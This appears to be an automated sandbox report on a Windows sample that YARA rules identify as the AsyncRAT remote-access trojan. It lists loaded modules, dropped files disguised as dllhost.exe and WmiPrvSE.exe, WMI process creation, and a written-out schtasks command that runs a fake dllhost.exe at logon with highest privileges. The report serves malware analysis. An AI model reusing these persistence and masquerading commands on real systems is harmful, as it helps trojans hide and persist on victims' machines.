Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\schannel\WmiPrvSE.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: version.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\ddraw\dllhost.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: mscoree.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: version.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: uxtheme.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: windows.storage.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: wldp.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: sspicli.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: amsi.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rasapi32.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rasman.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rtutils.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: winhttp.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: dhcpcsvc.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: winnsi.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Section loaded: fwpuclnt.dll

Source: PMDfwr7Jal.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.1698479357.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7720, type: MEMORYSTR	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: perfCrtmonitorsvcMonitorDll.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZyNSmFTtlPIEeiJBfofO.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZyNSmFTtlPIEeiJBfofO.exe0.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WmiPrvSE.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZyNSmFTtlPIEeiJBfofO.exe1.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dllhost.exe.4.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@22/19@1/1

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_00716EC9 GetLastError,FormatMessageW,

0_2_00716EC9

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Code function: 0_2_00729E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00729E1C

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\Program Files (x86)\microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\perfCrtmonitorsvcMonitorDll.exe.log

Jump to behavior

Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\ZyNSmFTtlPIEeiJBfofO.exe	Mutant created: \Sessions\1\BaseNamedObjects\ae1e7402ff59b2628ad8c21a27af6bc37000b8ae

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

File created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc

Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Command line argument: sfxname	0_2_0072D5D4
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Command line argument: sfxstime	0_2_0072D5D4
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Command line argument: STARTDLG	0_2_0072D5D4
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Command line argument: xjv	0_2_0072D5D4

Source: PMDfwr7Jal.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: PMDfwr7Jal.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: PMDfwr7Jal.exe	ReversingLabs: Detection: 68%
Source: PMDfwr7Jal.exe	Virustotal: Detection: 73%

Source: C:\Users\user\Desktop\PMDfwr7Jal.exe

File read: C:\Users\user\Desktop\PMDfwr7Jal.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PMDfwr7Jal.exe "C:\Users\user\Desktop\PMDfwr7Jal.exe"
Source: C:\Users\user\Desktop\PMDfwr7Jal.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe "C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe"
Source: C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\ddraw\dllhost.exe'" /rl HIGHEST /f
